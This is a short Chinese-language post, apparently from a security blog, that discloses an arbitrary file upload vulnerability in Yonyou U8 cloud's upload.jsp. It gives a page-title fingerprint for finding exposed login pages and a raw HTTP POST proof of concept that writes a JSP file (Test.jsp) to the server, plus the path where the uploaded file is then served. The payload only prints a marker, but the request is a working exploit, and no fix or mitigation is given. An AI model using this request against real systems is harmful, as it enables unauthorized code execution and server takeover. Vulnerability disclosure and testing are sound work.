Yonyou U8 cloud upload.jsp 文件存在任意文件上传漏洞,攻击者通过漏洞可以获取服务器权限
Yonyou U8 cloud
"开启U8 cloud云端之旅"
登陆页面
验证POC
POST /linux/pages/upload.jsp HTTP/1.1
Host:
Content-Type: application/x-www-form-urlencoded
filename: Test.jsp
Accept-Encoding: gzip
<% out.println("Test");%>
/linux/xxx.jsp
456 篇文章
如果觉得我的文章对您有用,请随意打赏。你的支持将鼓励我继续创作!